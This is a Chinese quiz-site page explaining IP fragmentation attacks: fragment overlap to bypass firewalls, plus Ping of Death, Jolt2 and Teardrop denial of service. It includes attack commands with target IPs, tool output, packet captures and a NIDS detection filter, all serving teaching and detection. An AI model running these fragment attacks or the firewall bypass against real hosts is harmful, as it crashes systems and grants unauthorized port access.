以下哪种攻击可能导致某些系统在重组IP分片的过程中宕机或者重新启动?()

---

---

---

Fragment Overlap 攻击。比起Tiny fragment攻击，fragment Overlap是更为精巧的攻击。攻击者为了发动攻击将攻击IP包分为两个分片。第一个分片中包含包过滤设备允许的 http(TCP 80) 等端口。在第二个分片中通过极小的偏移量造成第二个分片覆盖第一个分片的一部分内容。通常攻击者覆盖包含端口内容的部分。

由于在第一个分片中包含防火墙中允许的端口，因此第一个分片将会被通过。而第二个分片中具有允许通过的第一个分片ID，因此也被允许通过。但是当这两个分片到达目标主机进行重组之后，由于第一个分片的端口号被第二个分片的端口号覆盖，因此将会访问第二个分片中指定的端口。也就是绕过防火墙访问了未被授权的端口。

基于IP分片的拒绝服务攻击

IP分片不仅用于绕过防火墙或者IDS，而且也用于发动拒绝服务攻击。常见的Ping of Death 或者Teardrop属于这种攻击。

Ping of Death、Jolt 的攻击。这些攻击是通过发送超过RFC规范所规定IP报文而使操作系统无法正常工作的拒绝服务攻击。根据RFC-791 “Internet Protocol”规定，包含报头的IP 报文的最大长度为65,535， 在很多系统在处理IP报文时将其最大值假定为该值。通常可通过ping程序发起简单的攻击。一般情况下IP报头为20字节，而ICMP报头为 8字节，因此实际数据的最大长度为65535-20-8=65507字节。因此不限制ping报文最大长度的系统中，可通过如下命令发起攻击。

ping -l 65510 victim.host.ip.address

Windows NT系统中曾经允许类似命令，但是最近的系统不允许发送这种异常的数据报文。但是可通过jolt工具发送异常大的报文发起攻击。

[root@insecure DoS]# ./jolt2

Usage: ./jolt2 [-s src_addr] [-p port] dest_addr

Note: UDP used if a port is specified, otherwise ICMP

[root@insecure DoS]# ./jolt2 -p 139 192.168.0.30

可通过tcpdump监控到如下内容。

20:04:51.188599 test.com.cn > 192.168.0.30: (frag 1109:9@65520)

20:04:51.188850 test.com.cn > 192.168.0.30: (frag 1109:9@65520)

20:04:51.189103 test.com.cn > 192.168.0.30: (frag 1109:9@65520)

20:04:51.189358 test.com.cn > 192.168.0.30: (frag 1109:9@65520)

20:04:51.189608 test.com.cn > 192.168.0.30: (frag 1109:9@65520)

20:04:51.189864 test.com.cn > 192.168.0.30: (frag 1109:9@65520)

目标系统（Windows NT）192.168.0.30遭受攻击将会瘫痪。

Teardrop, bonk, New Teardrop 攻击。Teardrop 也是利用分片重组漏洞的拒绝服务攻击。通过操作第二个分片的偏移量，使分片在重组的过程中缓存溢出，从而使目标系统宕掉或者重新启动。下面通过实例说明Teardrop攻击。

[root@unsecure DoS]# ./teardrop.linux --help

./teardrop.linux src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]

[root@unsecure DoS]# ./teardrop.linux 1.1.1.1 192.168.0.30 -t 139

[ Binary courtesy: http://www.rootshell.com/ ]

teardrop route|daemon9

Death on flaxen wings:

From: 1.1.1.1.46838

To: 192.168.0.30. 139

Amt: 1

[ b00m ]

通过tcpdump可监听到如下内容。

23:29:18.503558 1.1.1.1.51331 > 192.168.0.30.139: udp 28 (frag 242:36@0+)

23:29:18.504693 1.1.1.1 > 192.168.0.30: (frag 242:4@24)

可以看出第一个分片大小为36，而第二个分片的偏移量为24。因此第一个分片与第二个分片重叠。从而可导致系统宕机或者重新启动。 与Teardrop类似的攻击有Bonk、New Teardrop等攻击。

看你问哪个层面上的原理了，如果只是站在抓包这一层来看表象，就是下面这种。

但要再具体到IP碎片重组过程中因重叠而如何如何，就不是那么容易说了，各个OS的
协议栈在碎片重组问题上有很多细微但又关键的差别，对某些变量的处理不尽一致，
有些是缓冲区溢出，有些是指针越界导致读取无效内存区域，那只能具体情况具体分
解了。

从前在Win9x下分析这个攻击时看的对象是vip.386，不用看vtcp.386。

☆ teardrop攻击

前面介绍的bonk.c、boink.c都是基于teardrop.c的。

用如下命令观察teardrop.c所发送出来的攻击报文

tcpdump -ntx -s 70 'src host 192.168.5.100 and udp'

--------------------------------------------------------------------------
192.168.5.100.1958 > 192.168.5.111.33978: udp 28 (frag 242:36@0+)
4500 0038 00f2 2000 4011 cd9f c0a8 0564
c0a8 056f 07a6 84ba 0024 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000
192.168.5.100 > 192.168.5.111: (frag 242:4@24)
4500 0018 00f2 0003 4011 edbc c0a8 0564
c0a8 056f 07a6 84ba 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000
--------------------------------------------------------------------------

原始teardrop.c只构造了两种碎片包，每次同时发送这两种UDP碎片包。如果指定发
送次数，将完全重复先前所发送出去的两种碎片包。泪滴攻击与oshare攻击不同，可
以跨越路由器远程攻击，ip_ttl会递减。

根据第一个碎片包，第二个碎片包的偏移应该是36，而不是现在的24，这里发生了重
叠。

NIDS可以考虑如下规则

tcpdump -ntx -s 70 '( ( ip[2:2] = 56 and ip[6:2] = 0x2000 ) or ( ip[2:2] = 24 and ip[6:2] = 0x0003 ) ) and udp'

以上为百科题库网整理的关于"以下哪种攻击可能导致某些系统在重组IP分片的过程中宕机或者重新启动?()"试题答案及解析，如想学习更多信息技术/IT类竞赛题，欢迎访问www.baiketk.com查看搜索更多相关信息。

转载请注明：百科题库网https://www.baiketk.com/q_u5ff7d38481e62.html